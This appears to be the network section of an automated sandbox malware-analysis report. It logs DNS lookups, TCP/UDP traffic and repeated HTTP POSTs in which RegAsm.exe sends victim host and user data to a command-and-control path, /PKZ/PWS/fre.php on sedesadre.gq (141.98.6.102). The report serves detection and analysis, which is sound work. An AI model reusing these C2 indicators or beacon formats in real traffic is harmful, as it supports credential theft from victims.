                                                                                                          Nov 29, 2022 16:52:31.018611908 CET8049725141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.018749952 CET4972580192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:31.018749952 CET4972580192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:31.047193050 CET8049725141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.308342934 CET4972680192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:31.336071014 CET8049726141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.336169958 CET4972680192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:31.339365005 CET4972680192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:31.367180109 CET8049726141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.367263079 CET4972680192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:31.395694017 CET8049726141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.441371918 CET8049726141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.441494942 CET8049726141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.441533089 CET4972680192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:31.441575050 CET4972680192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:31.469362020 CET8049726141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.785912991 CET4972780192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:31.814533949 CET8049727141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.814624071 CET4972780192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:31.817491055 CET4972780192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:31.844553947 CET8049727141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.844643116 CET4972780192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:31.871819019 CET8049727141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.911870003 CET8049727141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.912014008 CET4972780192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:31.912429094 CET8049727141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.912482023 CET4972780192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:31.939279079 CET8049727141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:32.167432070 CET4972880192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:32.195842028 CET8049728141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:32.195971966 CET4972880192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:32.198992968 CET4972880192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:32.226727962 CET8049728141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:32.226808071 CET4972880192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:32.254096031 CET8049728141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:32.293466091 CET8049728141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:32.293530941 CET8049728141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:32.293699980 CET4972880192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:32.294080019 CET4972880192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:32.321054935 CET8049728141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:32.657540083 CET4972980192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:32.685611963 CET8049729141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:32.686671019 CET4972980192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:32.689634085 CET4972980192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:32.718206882 CET8049729141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:32.718297958 CET4972980192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:32.746185064 CET8049729141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:32.805161953 CET8049729141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:32.805227041 CET8049729141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:32.805339098 CET4972980192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:32.805402040 CET4972980192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:32.835335016 CET8049729141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:33.239120960 CET4973080192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:33.269851923 CET8049730141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:33.269946098 CET4973080192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:33.273428917 CET4973080192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:33.300956964 CET8049730141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:33.301081896 CET4973080192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:33.330792904 CET8049730141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:33.400113106 CET8049730141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:33.400319099 CET8049730141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:33.400346994 CET4973080192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:33.400450945 CET4973080192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:33.429719925 CET8049730141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:33.726211071 CET4973180192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:33.754205942 CET8049731141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:33.754360914 CET4973180192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:33.757390976 CET4973180192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:33.785727978 CET8049731141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:33.785821915 CET4973180192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:33.814914942 CET8049731141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:33.852927923 CET8049731141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:33.853004932 CET8049731141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:33.853112936 CET4973180192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:33.853163958 CET4973180192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:33.880696058 CET8049731141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:36.292598963 CET4973280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:36.320857048 CET8049732141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:36.321800947 CET4973280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:36.325134993 CET4973280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:36.360413074 CET8049732141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:36.360503912 CET4973280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:36.388890028 CET8049732141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:36.428849936 CET8049732141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:36.428942919 CET8049732141.98.6.102192.168.2.7
                                                                                                          Nov 29, 2022 16:52:36.429011106 CET4973280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:36.429080963 CET4973280192.168.2.7141.98.6.102
                                                                                                          Nov 29, 2022 16:52:36.457051039 CET8049732141.98.6.102192.168.2.7

                                                                                                          UDP Packets

                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Nov 29, 2022 16:51:27.731278896 CET6117853192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:51:27.812835932 CET6392653192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:51:29.055094004 CET5333653192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:51:29.128258944 CET5100753192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:24.965707064 CET5002453192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:24.983006954 CET53500248.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:25.609745979 CET4951653192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:25.627433062 CET53495168.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:27.231417894 CET6267953192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:27.248811960 CET53626798.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:27.735085964 CET6139253192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:27.754470110 CET53613928.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:28.174541950 CET5210453192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:28.192017078 CET53521048.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:28.646147966 CET6535653192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:28.663779020 CET53653568.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:29.136881113 CET5900653192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:29.469077110 CET53590068.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:29.972295046 CET5152653192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:29.989815950 CET53515268.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.432616949 CET5113953192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:30.450237989 CET53511398.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:30.865406036 CET5878453192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:30.884907961 CET53587848.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.290296078 CET5797053192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:31.307420969 CET53579708.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:31.765007019 CET6460853192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:31.782563925 CET53646088.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:32.148758888 CET5874653192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:32.166456938 CET53587468.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:32.638763905 CET6243353192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:32.656164885 CET53624338.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:33.218455076 CET6124853192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:33.237142086 CET53612488.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:33.705962896 CET5275053192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:33.725223064 CET53527508.8.8.8192.168.2.7
                                                                                                          Nov 29, 2022 16:52:36.268440008 CET6407853192.168.2.78.8.8.8
                                                                                                          Nov 29, 2022 16:52:36.289087057 CET53640788.8.8.8192.168.2.7

                                                                                                          DNS Queries

                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Nov 29, 2022 16:51:27.731278896 CET192.168.2.78.8.8.80xba30Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:51:27.812835932 CET192.168.2.78.8.8.80xe1aStandard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:51:29.055094004 CET192.168.2.78.8.8.80x8f25Standard query (0)edi4gw.db.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:51:29.128258944 CET192.168.2.78.8.8.80xfe5bStandard query (0)edi4gw.db.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:24.965707064 CET192.168.2.78.8.8.80xa4c6Standard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:25.609745979 CET192.168.2.78.8.8.80x4b90Standard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:27.231417894 CET192.168.2.78.8.8.80xdf42Standard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:27.735085964 CET192.168.2.78.8.8.80x3e67Standard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:28.174541950 CET192.168.2.78.8.8.80x8a32Standard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:28.646147966 CET192.168.2.78.8.8.80xed58Standard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:29.136881113 CET192.168.2.78.8.8.80xe22eStandard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:29.972295046 CET192.168.2.78.8.8.80xd42aStandard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:30.432616949 CET192.168.2.78.8.8.80xaba4Standard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:30.865406036 CET192.168.2.78.8.8.80x843cStandard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:31.290296078 CET192.168.2.78.8.8.80xcea1Standard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:31.765007019 CET192.168.2.78.8.8.80xbf29Standard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:32.148758888 CET192.168.2.78.8.8.80x2cc8Standard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:32.638763905 CET192.168.2.78.8.8.80xf86bStandard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:33.218455076 CET192.168.2.78.8.8.80x904cStandard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:33.705962896 CET192.168.2.78.8.8.80x2ec1Standard query (0)sedesadre.gqA (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:36.268440008 CET192.168.2.78.8.8.80xc48eStandard query (0)sedesadre.gqA (IP address)IN (0x0001)false

                                                                                                          DNS Answers

                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Nov 29, 2022 16:51:27.775491953 CET8.8.8.8192.168.2.70xba30No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:51:27.832566023 CET8.8.8.8192.168.2.70xe1aNo error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:51:29.099885941 CET8.8.8.8192.168.2.70x8f25No error (0)edi4gw.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:51:29.099885941 CET8.8.8.8192.168.2.70x8f25No error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:51:29.172468901 CET8.8.8.8192.168.2.70xfe5bNo error (0)edi4gw.db.files.1drv.comdb-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:51:29.172468901 CET8.8.8.8192.168.2.70xfe5bNo error (0)db-files.fe.1drv.comodc-db-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:51:29.172468901 CET8.8.8.8192.168.2.70xfe5bNo error (0)l-0003.l-dc-msedge.net13.107.43.12A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:24.983006954 CET8.8.8.8192.168.2.70xa4c6No error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:25.627433062 CET8.8.8.8192.168.2.70x4b90No error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:27.248811960 CET8.8.8.8192.168.2.70xdf42No error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:27.754470110 CET8.8.8.8192.168.2.70x3e67No error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:28.192017078 CET8.8.8.8192.168.2.70x8a32No error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:28.663779020 CET8.8.8.8192.168.2.70xed58No error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:29.469077110 CET8.8.8.8192.168.2.70xe22eNo error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:29.989815950 CET8.8.8.8192.168.2.70xd42aNo error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:30.450237989 CET8.8.8.8192.168.2.70xaba4No error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:30.884907961 CET8.8.8.8192.168.2.70x843cNo error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:31.307420969 CET8.8.8.8192.168.2.70xcea1No error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:31.782563925 CET8.8.8.8192.168.2.70xbf29No error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:32.166456938 CET8.8.8.8192.168.2.70x2cc8No error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:32.656164885 CET8.8.8.8192.168.2.70xf86bNo error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:33.237142086 CET8.8.8.8192.168.2.70x904cNo error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:33.725223064 CET8.8.8.8192.168.2.70x2ec1No error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false
                                                                                                          Nov 29, 2022 16:52:36.289087057 CET8.8.8.8192.168.2.70xc48eNo error (0)sedesadre.gq141.98.6.102A (IP address)IN (0x0001)false

                                                                                                          HTTP Request Dependency Graph

                                                                                                          • sedesadre.gq

                                                                                                          HTTP Packets

                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          0192.168.2.749716141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:25.029133081 CET2247OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 198
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:25.057019949 CET2247OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: 'ckav.rufrontdesk610930DESKTOP-716T771k08F9C4E9C79A3B52B3F739430Sbol5
                                                                                                          Nov 29, 2022 16:52:25.134174109 CET2247INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:25 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 15
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          1192.168.2.749717141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:26.668343067 CET2248OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 198
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:26.698062897 CET2249OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: 'ckav.rufrontdesk610930DESKTOP-716T771+08F9C4E9C79A3B52B3F739430lav9j
                                                                                                          Nov 29, 2022 16:52:26.780868053 CET2249INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:26 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 15
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          10192.168.2.749726141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:31.339365005 CET2261OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:31.367263079 CET2262OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:31.441371918 CET2262INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:31 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          11192.168.2.749727141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:31.817491055 CET2263OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:31.844643116 CET2263OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:31.911870003 CET2263INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:31 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          12192.168.2.749728141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:32.198992968 CET2264OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:32.226808071 CET2264OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:32.293466091 CET2265INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:32 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                          13192.168.2.749729141.98.6.10280C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                          Nov 29, 2022 16:52:32.689634085 CET2266OUTPOST /PKZ/PWS/fre.php HTTP/1.0
                                                                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                                          Host: sedesadre.gq
                                                                                                          Accept: */*
                                                                                                          Content-Type: application/octet-stream
                                                                                                          Content-Encoding: binary
                                                                                                          Content-Key: ACA06F78
                                                                                                          Content-Length: 171
                                                                                                          Connection: close
                                                                                                          Nov 29, 2022 16:52:32.718297958 CET2266OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 36 00 31 00 30 00 39 00 33 00 30 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37
                                                                                                          Data Ascii: (ckav.rufrontdesk610930DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                                                                                          Nov 29, 2022 16:52:32.805161953 CET2266INHTTP/1.0 404 Not Found
                                                                                                          Date: Tue, 29 Nov 2022 15:52:32 GMT
                                                                                                          Server: Apache
                                                                                                          Status: 404 Not Found
                                                                                                          Content-Length: 23
                                                                                                          Connection: close
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                                          Data Ascii: File not found.


